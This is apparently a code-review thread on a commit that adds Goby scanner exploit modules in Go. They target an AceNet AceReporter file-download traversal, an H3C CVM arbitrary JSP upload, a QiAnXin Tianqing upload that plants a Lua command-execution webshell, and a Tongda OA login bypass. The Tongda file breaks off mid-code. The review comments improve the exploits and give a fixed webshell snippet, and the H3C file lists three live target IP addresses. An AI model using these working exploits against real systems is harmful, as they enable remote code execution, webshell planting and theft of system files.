-
1 + package exploits 2 + 3 + import ( 4 + "git.gobies.org/goby/goscanner/goutils" 5 + ) 6 + 7 + func init() { 8 + expJson := `{ 9 + "Name": "AceNet AceReporter Report component Arbitrary file download", 10 + "Description": "All firewall devices that use the AceNet AceReporter report component can download arbitrary files", 11 + "Product": "AceNet AceReporter Report component", 12 + "Homepage": "", 13 + "DisclosureDate": "2021-08-04", 14 + "Author": "[email protected]", 15 + "GobyQuery": "title=\"Login @ Reporter\" || title=\"Technology, Inc.\"", 16 + "Level": "2", 17 + "Impact": "<p><span style=\"font-size: 14px;\">The vulnerability of arbitrary file download or read is mainly caused by the fact that when the application system provides the function of file download or read, the application system directly specifies the file path in the file path parameter without verifying the validity of the file path. As a result, the attacker can jump through the directory (..</span><span style=\"font-size: 14px;\">\\ or..</span><span style=\"font-size: 14px;\">/) to download or read a file beyond the original specified path.</span><span style=\"font-size: 14px;\">The attacker can finally download or read any files on the system through this vulnerability, such as database files, application system source code, password configuration information and other important sensitive information, resulting in sensitive information leakage of the system.</span><br></p>", 18 + "Recommandation": "<p><span style=\"font-size: 14px;\">Limit ..</span><span style=\"font-size: 14px;\">/ symbol is used to determine the input path when the file is downloaded. 
The best method is that the file should be one to one in the database, and avoid entering the absolute path to obtain the file</span><br></p>", 19 + "References": [ 20 + "https://www.cnvd.org.cn/flaw/show/CNVD-2021-41972" 21 + ], 22 + "HasExp": true, 23 + "ExpParams": [ 24 + { 25 + "name": "path", 26 + "type": "createSelect", 27 + "value": "../../../../../../../../../etc/passwd,../../../../../../../../../etc/hosts", 28 + "show": "" 29 + } 30 + ], 31 + "ExpTips": { 32 + "Type": "", 33 + "Content": "" 34 + }, 35 + "ScanSteps": [ 36 + "AND", 37 + { 38 + "Request": { 39 + "method": "GET", 40 + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/passwd&savename=data.txt", 41 + "follow_redirect": true, 42 + "header": {}, 43 + "data_type": "text", 44 + "data": "" 45 + }, 46 + "ResponseTest": { 47 + "type": "group", 48 + "operation": "AND", 49 + "checks": [ 50 + { 51 + "type": "item", 52 + "variable": "$body", 53 + "operation": "contains", 54 + "value": "root", 55 + "bz": "" 56 + }, 57 + { 58 + "type": "item", 59 + "variable": "$body", 60 + "operation": "contains", 61 + "value": "daemon", 62 + "bz": "" 63 + } 64 + ] 65 + }, 66 + "SetVariable": [] 67 + }, 68 + { 69 + "Request": { 70 + "method": "GET", 71 + "uri": "/view/action/download_file.php?filename=../../../../../../../../../etc/hosts&savename=data.txt", 72 + "follow_redirect": true, 73 + "header": {}, 74 + "data_type": "text", 75 + "data": "" 76 + }, 77 + "ResponseTest": { 78 + "type": "group", 79 + "operation": "AND", 80 + "checks": [ 81 + { 82 + "type": "item", 83 + "variable": "$code", 84 + "operation": "==", 85 + "value": "200", 86 + "bz": "" 87 + }, 88 + { 89 + "type": "item", 90 + "variable": "$body", 91 + "operation": "contains", 92 + "value": "127.0.0.1", 93 + "bz": "" 94 + } 95 + ] 96 + }, 97 + "SetVariable": [] 98 + } 99 + ], 100 + "ExploitSteps": [ 101 + "AND", 102 + { 103 + "Request": { 104 + "method": "GET", 105 + "uri": 
"/view/action/download_file.php?filename={{{path}}}&savename=data.txt", 106 + "follow_redirect": true, 107 + "header": {}, 108 + "data_type": "text", 109 + "data": "" 110 + }, 111 + "SetVariable": [ 112 + "output|lastbody" 113 + ] 114 + } 115 + ], 116 + "Tags": [ 117 + "file download" 118 + ], 119 + "CVEIDs": null, 120 + "CVSSScore": "0.0", 121 + "AttackSurfaces": { 122 + "Application": null, 123 + "Support": null, 124 + "Service": null, 125 + "System": null, 126 + "Hardware": null 127 + } 128 + }` 129 + 130 + ExpManager.AddExploit(NewExploit( 131 + goutils.GetFileName(), 132 + expJson, 133 + nil, 134 + nil, 135 + )) 136 + } 137 + -
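Review bot: The metadata key at file line 18 is spelled `"Recommandation"` while the other exploits in this commit use `"Recommendation"` (H3C file line 23, Tianqing file line 24), so this field is presumably dropped silently by whatever parses expJson; rename it to `"Recommendation"`. The detection at lines 54 and 61 only asserts that the body contains the substrings `root` and `daemon`, which an ordinary login or error page can satisfy; matching the passwd record shape instead, e.g. `"value": "root:x:0:0:"` (or a regex over `root:.*:0:0:` if the engine supports one), would cut false positives, and the second step (lines 68-98) adds little beyond a `127.0.0.1` substring with a 200. The ExploitSteps (lines 100-115) have no ResponseTest and hand back `output|lastbody` raw, so a server error page is presented to the operator as the file contents; add at least a status check there. `CVSSScore` is left at `0.0` for an unauthenticated arbitrary file read rated Level 2 — fill it in or note why it is unset.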
-
1 + package exploits 2 + 3 + import ( 4 + "git.gobies.org/goby/goscanner/goutils" 5 + "git.gobies.org/goby/goscanner/jsonvul" 6 + "git.gobies.org/goby/goscanner/scanconfig" 7 + "git.gobies.org/goby/httpclient" 8 + "strings" 9 + ) 10 + 11 + func init() { 12 + expJson := `{ 13 + "Name": "H3C CVM Arbitrary File Upload Vulnerability", 14 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>", 15 + "Product": "H3C-CVM", 16 + "Homepage": "http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/", 17 + "DisclosureDate": "2022-05-25", 18 + "Author": "[email protected]", 19 + "FofaQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")", 20 + "GobyQuery": " server=\"H3C-CVM\" || (banner=\"H3C-CVM\" && banner=\"Server: \")", 21 + "Level": "3", 22 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary 
files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>", 23 + "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>", 24 + "References": [ 25 + "https://fofa.so/" 26 + ], 27 + "Is0day": false, 28 + "HasExp": true, 29 + "ExpParams": [ 30 + { 31 + "name": "fileName", 32 + "type": "input", 33 + "value": "evil", 34 + "show": "" 35 + }, 36 + { 37 + "name": "fileContent", 38 + "type": "input", 39 + "value": "<%out.println(\"123\");%>", 40 + "show": "" 41 + } 42 + ], 43 + "ExpTips": { 44 + "Type": "", 45 + "Content": "" 46 + }, 47 + "ScanSteps": [ 48 + "AND", 49 + { 50 + "Request": { 51 + "method": "GET", 52 + "uri": "/test.php", 53 + "follow_redirect": true, 54 + "header": {}, 55 + "data_type": "text", 56 + "data": "" 57 + }, 58 + "ResponseTest": { 59 + "type": "group", 60 + "operation": "AND", 61 + "checks": [ 62 + { 63 + "type": "item", 64 + "variable": "$code", 65 + "operation": "==", 66 + "value": "200", 67 + "bz": "" 68 + }, 69 + { 70 + "type": "item", 71 + "variable": "$body", 72 + "operation": "contains", 73 + "value": "test", 74 + "bz": "" 75 + } 76 + ] 77 + }, 78 + "SetVariable": [] 79 + } 80 + ], 81 + "ExploitSteps": [ 82 + "AND", 83 + { 84 + "Request": { 85 + "method": "GET", 86 + "uri": "/test.php", 87 + "follow_redirect": true, 88 + "header": {}, 89 + "data_type": "text", 90 + "data": "" 91 + }, 92 + "ResponseTest": { 93 + "type": "group", 94 + "operation": "AND", 95 + "checks": [ 96 + { 97 + "type": "item", 98 + "variable": "$code", 99 + "operation": "==", 100 + "value": "200", 101 + "bz": "" 102 + }, 103 + { 104 + "type": "item", 105 + "variable": "$body", 106 + "operation": 
"contains", 107 + "value": "test", 108 + "bz": "" 109 + } 110 + ] 111 + }, 112 + "SetVariable": [] 113 + } 114 + ], 115 + "Tags": [ 116 + "Arbitrary File Creation" 117 + ], 118 + "VulType": [ 119 + "Arbitrary File Creation" 120 + ], 121 + "CVEIDs": [ 122 + "" 123 + ], 124 + "CNNVD": [ 125 + "" 126 + ], 127 + "CNVD": [ 128 + "" 129 + ], 130 + "CVSSScore": "8.0", 131 + "Translation": { 132 + "CN": { 133 + "Name": "H3C CVM 前台任意文件上传漏洞", 134 + "Product": "H3C-CVM", 135 + "Description": "<p>H3C 公司依托其强大的技术实力、 产品与服务优势, 以及深入人心的以客户为中心的理念, 为企业数据中心 IaaS 云计算基础架构 提供最优化的虚拟化与云业务运营解决方案。 通过 H3C CAS CVM 虚拟化管理系统实现数据中心虚拟化环境的中央管理控制, 以 简洁的管理界面, 统一管理数据中心内所有的物理资源和虚拟资源, 不仅能提高管理员的管控能力、 简化日常例行工作, 更可降低 IT 环境的复杂度和管理成本。<br></p><p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM 存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>", 136 + "Recommendation": "<p>目前官方尚未发布安全补丁,请关注厂商更新。<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>", 137 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C CVM</span><span style=\"color: rgb(22, 28, 37); font-size: 16px;\"> </span>存在任意文件上传漏洞,攻击者可以上传任意文件,获取 webshell,控制服务器权限,读取敏感信息等。</span><br></p>", 138 + "VulType": [ 139 + "⽂件上传" 140 + ], 141 + "Tags": [ 142 + "⽂件上传" 143 + ] 144 + }, 145 + "EN": { 146 + "Name": "H3C CVM Arbitrary File Upload Vulnerability", 147 + "Product": "H3C-CVM", 148 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">H3C company relies on its strong technical strength, product and service advantages, as well as the popular customer-centric concept to provide optimized virtualization and cloud business operation solutions for the IAAs cloud computing infrastructure of enterprise data center. 
Through the H3C CAS CVM virtualization management system, we can realize the central management and control of the virtualized environment in the data center. With a simple management interface, we can uniformly manage all physical and virtual resources in the data center, which can not only improve the management and control ability of administrators, simplify daily routine work, but also reduce the complexity and management cost of the IT environment.</span></p><p><span style=\"color: var(--primaryFont-color);\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>", 149 + "Recommendation": "<p>At present, the official has not released a security patch, please pay attention to the manufacturer's update.<a href=\"http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/\" target=\"_blank\">http://www.h3c.com/cn/Service/Document_Software/Software_Download/H3Cloud/Catalog/Cloud_Virtualization/CAS_CVM/</a><br></p>", 150 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">H3C-CVM has an arbitrary file upload vulnerability, which allows attackers to upload arbitrary files, obtain webshell, control server permissions, read sensitive information, etc.</span><br></p>", 151 + "VulType": [ 152 + "Arbitrary File Creation" 153 + ], 154 + "Tags": [ 155 + "Arbitrary File Creation" 156 + ] 157 + } 158 + }, 159 + "AttackSurfaces": { 160 + "Application": null, 161 + "Support": null, 162 + "Service": null, 163 + "System": null, 164 + "Hardware": null 165 + } 166 + }` 167 + 168 + exploitUploadFile2398429842 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { 169 + 170 + // 上传文件 171 + requestConfig := httpclient.NewPostRequestConfig("/cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/" + fileName + 
".jsp&name=222") 172 + requestConfig.VerifyTls = false 173 + requestConfig.FollowRedirect = false 174 + requestConfig.Header.Store("Content-range", "bytes 0-10/20") 175 + requestConfig.Header.Store("Referer", "http://"+host.HostInfo+"/cas/login") 176 + requestConfig.Data = fileContent 177 + 178 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 179 + if resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, "\"success\\\":true") { 180 + return true 181 + } 182 + } 183 + 184 + return false 185 + } 186 + 187 + checkUploadFile12312313810923 := func(fileName string, fileContent string, host *httpclient.FixUrl) bool { 188 + 189 + requestConfig := httpclient.NewGetRequestConfig("/" + fileName) 190 + requestConfig.VerifyTls = false 191 + requestConfig.FollowRedirect = false 192 + 193 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 194 + return resp.StatusCode == 200 && strings.Contains(resp.Utf8Html, fileContent) 195 + } 196 + 197 + return false 198 + } 199 + 200 + ExpManager.AddExploit(NewExploit( 201 + goutils.GetFileName(), 202 + expJson, 203 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 204 + 205 + rand := goutils.RandomHexString(6) 206 + rand2 := goutils.RandomHexString(6) 207 + 208 + if exploitUploadFile2398429842(rand2, "<%out.print(\""+rand+"\");%>", u) { 209 + return checkUploadFile12312313810923("/cas/js/lib/buttons/"+rand2+".jsp", rand, u) 210 + } 211 + 212 + return false 213 + }, 214 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 215 + 216 + fileContent := ss.Params["fileContent"].(string) 217 + fileName := ss.Params["fileName"].(string) 218 + 219 + if exploitUploadFile2398429842(fileName, fileContent, expResult.HostInfo) { 220 + 221 + expResult.Success = true 222 + expResult.Output = "文件上传已成功,请检查路径:/cas/js/lib/buttons/" + fileName + ".jsp" 223 + } 224 + 225 + return expResult 226 + }, 227 + )) 228 + } 229 
+ 230 + // http://183.63.173.141:8080/ 231 + // https://60.190.202.42:8443/ 232 + // http://61.53.232.5:28080/ -
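Review bot: `checkUploadFile12312313810923` at file line 189 prepends `/` to `fileName`, but its only caller (line 209) already passes `/cas/js/lib/buttons/<rand>.jsp`, so the verification request goes to `//cas/js/lib/buttons/...`; whether that resolves depends on the container's path normalisation, and the fix is `requestConfig := httpclient.NewGetRequestConfig(fileName)` with the caller keeping the full path (or `strings.TrimPrefix(fileName, "/")`). The detection callback (lines 203-213) writes a real JSP with `out.print` into the webapp and never removes it, so every scan leaves an executable artifact on the target under a random name that is not reported to the operator; at minimum record the path in the output, as the exploit branch at line 222 already does. The success test at line 179 looks for the literal sequence `"success\":true` (a backslash before the quote), which only matches a double-encoded body — confirm against a real response, since a plain `{"success":true}` would be reported as failure. Lines 230-232 commit three live, internet-routable hosts as comments; drop them before this lands in a shared repository. The ScanSteps/ExploitSteps JSON (lines 47-114) probe `/test.php` for the string `test`, which reads as a template placeholder rather than a check for this product; if the Go callbacks supersede them, say so in a comment, otherwise they will misfire.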
1 + package exploits 2 + 3 + import ( 4 + "fmt" 5 + "git.gobies.org/goby/goscanner/goutils" 6 + "git.gobies.org/goby/goscanner/jsonvul" 7 + "git.gobies.org/goby/goscanner/scanconfig" 8 + "git.gobies.org/goby/httpclient" 9 + "strings" 10 + ) 11 + 12 + func init() { 13 + expJson := `{ 14 + "Name": "QiAnXin Tianqing terminal security management system client_upload_file.json getshell", 15 + "Description": "There is an arbitrary file upload vulnerability in QiAnXin Tianqing terminal security management system, and the attacker can upload his own webshell to control the server.", 16 + "Product": "360-TianQing", 17 + "Homepage": "https://www.qianxin.com/product/detail/pid/49", 18 + "DisclosureDate": "2021-04-09", 19 + "Author": "[email protected]", 20 + "FofaQuery": "app=\"360-TianQing\"", 21 + "GobyQuery": "app=\"360-TianQing\"", 22 + "Level": "3", 23 + "Impact": "", 24 + "Recommendation": "", 25 + "References": [ 26 + "http://fofa.so" 27 + ], 28 + "HasExp": true, 29 + "ExpParams": [ 30 + { 31 + "name": "cmd", 32 + "type": "input", 33 + "value": "whoami" 34 + } 35 + ], 36 + "ExpTips": { 37 + "Type": "", 38 + "Content": "" 39 + }, 40 + "ScanSteps": [ 41 + "AND", 42 + { 43 + "Request": { 44 + "data": "", 45 + "data_type": "text", 46 + "follow_redirect": true, 47 + "method": "GET", 48 + "uri": "/" 49 + }, 50 + "ResponseTest": { 51 + "checks": [ 52 + { 53 + "bz": "", 54 + "operation": "==", 55 + "type": "item", 56 + "value": "200", 57 + "variable": "$code" 58 + } 59 + ], 60 + "operation": "AND", 61 + "type": "group" 62 + } 63 + } 64 + ], 65 + "ExploitSteps": null, 66 + "Tags": ["getshell"], 67 + "CVEIDs": null, 68 + "CVSSScore": "0.0", 69 + "AttackSurfaces": { 70 + "Application": ["360-TianQing"], 71 + "Support": null, 72 + "Service": null, 73 + "System": null, 74 + "Hardware": null 75 + } 76 + }` 77 + 78 + ExpManager.AddExploit(NewExploit( 79 + goutils.GetFileName(), 80 + expJson, 81 + func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool { 
82 + randomFilename := goutils.RandomHexString(4) 83 + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=3cb95cfbe1035bce8c448fcaf80fe7d9&filename=../../lua/%s.LUAC", randomFilename)) 84 + cfg.VerifyTls = false 85 + cfg.FollowRedirect = false 86 + cfg.Header.Store("Referer", u.FixedHostInfo) 87 + cfg.Header.Store("Cookie", "SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B") 88 + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ") 89 + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n" 90 + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n" 91 + cfg.Data += "Content-Type: application/xxxx\r\n\r\n" 92 + cfg.Data += "hello,world\r\n" 93 + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--" 94 + if resp, err := httpclient.DoHttpRequest(u, cfg); err == nil && resp.StatusCode == 200 { 95 + return strings.Contains(resp.Utf8Html, "\"status\":true") && 96 + strings.Contains(resp.Utf8Html, "upload file success") 97 + } 98 + return false 99 + }, 100 + func(expResult *jsonvul.ExploitResult, ss *scanconfig.SingleScanConfig) *jsonvul.ExploitResult { 101 + randomFilename := goutils.RandomHexString(4) 102 + cfg := httpclient.NewPostRequestConfig(fmt.Sprintf("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/%s.LUAC", randomFilename)) 103 + //cfg := httpclient.NewPostRequestConfig("/api/client_upload_file.json?mid=202cb962ac59075b964b07152d234b10&md5=88aca4dfc84d8abd8c2b01a572d60339&filename=../../lua/sky.LUAC") 104 + cfg.VerifyTls = false 105 + cfg.FollowRedirect = false 106 + cfg.Header.Store("Referer", expResult.HostInfo.FixedHostInfo) 107 + cfg.Header.Store("Cookie", 
"SKYLARe6721bd9ccd89f1a7ee7d79d35=71jm0o74c4k934fqechjeau0f7; YII_CSRF_TOKEN=74eae12048c53a096d8053873d9462ad07f1c51cs%3A40%3A%228a2d2746bb28b7bb46f038160b5e2c6d5b095d64%22%3B") 108 + cfg.Header.Store("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryLx7ATxHThfk91oxQ") 109 + cfg.Data = "------WebKitFormBoundaryLx7ATxHThfk91oxQ\r\n" 110 + cfg.Data += "Content-Disposition: form-data; name=\"file\"; filename=\"flash.php\"\r\n" 111 + cfg.Data += "Content-Type: application/xxxx\r\n\r\n" 112 + cfg.Data += "if ngx.req.get_uri_args().cmd then\r\n" 113 + cfg.Data += "cmd = ngx.req.get_uri_args().cmd\r\n" 114 + cfg.Data += "local t = io.popen(cmd)\r\n" 115 + cfg.Data += "local a = t:read(\"*all\")\r\n" 116 + cfg.Data += "ngx.say(a)\r\n" 117 + cfg.Data += "end\r\n" 118 + cfg.Data += "------WebKitFormBoundaryLx7ATxHThfk91oxQ--" 119 + httpclient.DoHttpRequest(expResult.HostInfo, cfg) 120 + cmd := ss.Params["cmd"].(string) 121 + if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + fmt.Sprintf("/api/%s.json?cmd=%s", randomFilename, cmd)); err == nil && resp.StatusCode == 200 { 122 + expResult.Success = true 123 + expResult.Output = resp.Utf8Html 124 + } 125 + return expResult 126 + }, 127 + )) 128 + } 129 + -
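Review bot: In the exploit callback the `cmd` parameter (file line 120) is interpolated into the query string at line 121 without escaping, so anything containing a space, `&` or `#` (e.g. `cat /etc/passwd`) is truncated or mis-parsed by the target; use `url.QueryEscape(cmd)` and add `"net/url"` to the import block, as the TopACM file in this commit already does. The upload response at line 119 is discarded entirely, so a failed or rejected upload is followed by a blind GET, and any 200 from `/api/<rand>.json` is reported as success with its body as output. The exploit also drops a persistent Lua shell (`io.popen` on an attacker-supplied argument, lines 112-117) under a random name that never appears in `expResult.Output`, so the operator cannot remove it afterwards; record the path, and note that the detection callback (lines 82-98) likewise leaves `hello,world` at `../../lua/<rand>.LUAC` on every scan. The fixed `mid`, `md5` and Cookie values (lines 83, 87) look like constants captured from one environment — a comment explaining what they are, or that the server does not validate them, would help the next maintainer.
```go
		// … unchanged: build the multipart upload of the Lua shell …
		if resp, err := httpclient.DoHttpRequest(expResult.HostInfo, cfg); err != nil || resp.StatusCode != 200 {
			return expResult
		}
		cmd := ss.Params["cmd"].(string)
		shellPath := fmt.Sprintf("/api/%s.json", randomFilename)
		// Escape cmd so spaces and '&' survive the query string.
		if resp, err := httpclient.SimpleGet(expResult.HostInfo.FixedHostInfo + shellPath + "?cmd=" + url.QueryEscape(cmd)); err == nil && resp.StatusCode == 200 {
			expResult.Success = true
			// Report the dropped file so it can be removed after testing.
			expResult.Output = "shell written to " + shellPath + "\n" + resp.Utf8Html
		}
		return expResult
```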
-
-
1 + package exploits 2 + 3 + import ( 4 + "git.gobies.org/goby/goscanner/goutils" 5 + "git.gobies.org/goby/goscanner/jsonvul" 6 + "git.gobies.org/goby/goscanner/scanconfig" 7 + "git.gobies.org/goby/httpclient" 8 + "regexp" 9 + "strings" 10 + ) 11 + 12 + func init() { 13 + expJson := `{ 14 + "Name": "Tongda OA Arbitrary User Login Vulnerability", 15 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>", 16 + "Product": "Tongda-OA", 17 + "Homepage": "https://www.tongda2000.com/", 18 + "DisclosureDate": "2021-05-20", 19 + "Author": "[email protected]", 20 + "FofaQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示:不能登录OA\" && body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"", 21 + "GobyQuery": "body=\"/static/templates/2013_01/index.css/\" || body=\"javascript:document.form1.UNAME.focus()\" || body=\"href=\\\"/static/images/tongda.ico\\\"\" || body=\"<link rel=\\\"shortcut icon\\\" href=\\\"/images/tongda.ico\\\" />\" || (body=\"OA提示:不能登录OA\" && 
body=\"紧急通知:今日10点停电\") || title=\"Office Anywhere 2013\" || title=\"Office Anywhere 2015\" || (body=\"tongda.ico\" && (title=\"OA\" || title=\"办公\")) || body=\"class=\\\"STYLE1\\\">新OA办公系统\"", 22 + "Level": "3", 23 + "Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>", 24 + "Recommendation": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><a href=\"https://www.tongda2000.com/\" target=\"_blank\"><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Please follow the manufacturer's website to update it in time. </span>https://www.tongda2000.com/</a><br></p>", 25 + "References": [ 26 + "https://fofa.so/" 27 + ], 28 + "Is0day": true, 29 + "HasExp": true, 30 + "ExpParams": [], 31 + "ExpTips": { 32 + "Type": "", 33 + "Content": "" 34 + }, 35 + "ScanSteps": [ 36 + "AND", 37 + { 38 + "Request": { 39 + "method": "GET", 40 + "uri": "/", 41 + "follow_redirect": true, 42 + "header": {}, 43 + "data_type": "text", 44 + "data": "" 45 + }, 46 + "ResponseTest": { 47 + "type": "group", 48 + "operation": "AND", 49 + "checks": [ 50 + { 51 + "type": "item", 52 + "variable": "$code", 53 + "operation": "==", 54 + "value": "200", 55 + "bz": "" 56 + } 57 + ] 58 + }, 59 + "SetVariable": [] 60 + } 61 + ], 62 + "ExploitSteps": [ 63 + "AND", 64 + { 65 + "Request": { 66 + "method": "GET", 67 + "uri": "", 68 + "follow_redirect": true, 69 + "header": {}, 70 + "data_type": "text", 71 + "data": "" 72 + }, 73 + "ResponseTest": { 74 + "type": "group", 75 + "operation": "AND", 76 + "checks": [ 77 + { 78 + "type": "item", 79 + "variable": "$code", 80 + "operation": "==", 81 + "value": "200", 82 + "bz": "" 83 + } 84 + ] 85 + }, 86 + "SetVariable": [] 87 + } 88 + ], 89 + "Tags": [ 90 + "Login Bypass" 91 + ], 92 + "VulType": [ 93 + 
"Login Bypass" 94 + ], 95 + "CVEIDs": [ 96 + "" 97 + ], 98 + "CNNVD": [ 99 + "" 100 + ], 101 + "CNVD": [ 102 + "" 103 + ], 104 + "CVSSScore": "9.0", 105 + "Translation": { 106 + "CN": { 107 + "Name": "通达 OA 任意用户登陆漏洞", 108 + "Product": "通达-OA", 109 + "Description": "<p>通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。<br></p><p>通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。</p>", 110 + "Recommendation": "<p>请联系官方厂商进行更新。<a href=\"https://www.tongda2000.com/\" target=\"_blank\">https://www.tongda2000.com/</a><br></p>", 111 + "Impact": "<p><span style=\"color: rgb(22, 28, 37); font-size: 16px;\">通达存在任意用户登陆漏洞,攻击者可以通过指定接口登陆任意用户,获取后台管理权限,直接登录后台进行敏感操作。</span><br></p>", 112 + "VulType": [ 113 + "登录绕过" 114 + ], 115 + "Tags": [ 116 + "登录绕过" 117 + ] 118 + }, 119 + "EN": { 120 + "Name": "Tongda OA Arbitrary User Login Vulnerability", 121 + "Product": "Tongda-OA", 122 + "Description": "<p><span style=\"color: var(--primaryFont-color);\">Tongda OA (Office Anywhere Network Intelligent Office System) is a collaborative office automation software independently developed by Beijing Tongda Xinke Technology Co., Ltd. It is a comprehensive management office platform formed by combining with Chinese enterprise management practices.</span><br></p><p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>", 123 + "Recommendation": "<p><span style=\"color: rgb(22, 51, 102); font-size: 16px;\"></span><a href=\"https://www.tongda2000.com/\" target=\"_blank\"><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Please follow the manufacturer's website to update it in time. 
</span>https://www.tongda2000.com/</a><br></p>", 124 + "Impact": "<p><span style=\"color: rgb(0, 0, 0); font-size: 16px;\">Tongda has an arbitrary user login vulnerability. An attacker can log in to any user through the specified interface, obtain background management permissions, and directly log in to the background for sensitive operations.</span><br></p>", 125 + "VulType": [ 126 + "Login Bypass" 127 + ], 128 + "Tags": [ 129 + "Login Bypass" 130 + ] 131 + } 132 + }, 133 + "AttackSurfaces": { 134 + "Application": null, 135 + "Support": null, 136 + "Service": null, 137 + "System": null, 138 + "Hardware": null 139 + } 140 + }` 141 + 142 + checkIsTongdaOA1231234 := func(host *httpclient.FixUrl) bool { 143 + requestConfig := httpclient.NewGetRequestConfig("/inc/expired.php") 144 + requestConfig.VerifyTls = false 145 + requestConfig.FollowRedirect = false 146 + 147 + if resp, err := httpclient.DoHttpRequest(host, requestConfig); err == nil { 148 + return resp.StatusCode == 200 && strings.Contains(resp.RawBody, "tongda") 149 + } 150 + return false 151 + } 152 + 153 + getTongdaCodeUID435345 := func(host *httpclient.FixUrl) string { 154 + requestConfig := httpclient.NewGetRequestConfig("/ispirit/login_code.php") 155 + requestConfig.VerifyTls = false 156 + requestConfig.FollowRedirect = false 157 + 158 + if resp, err := 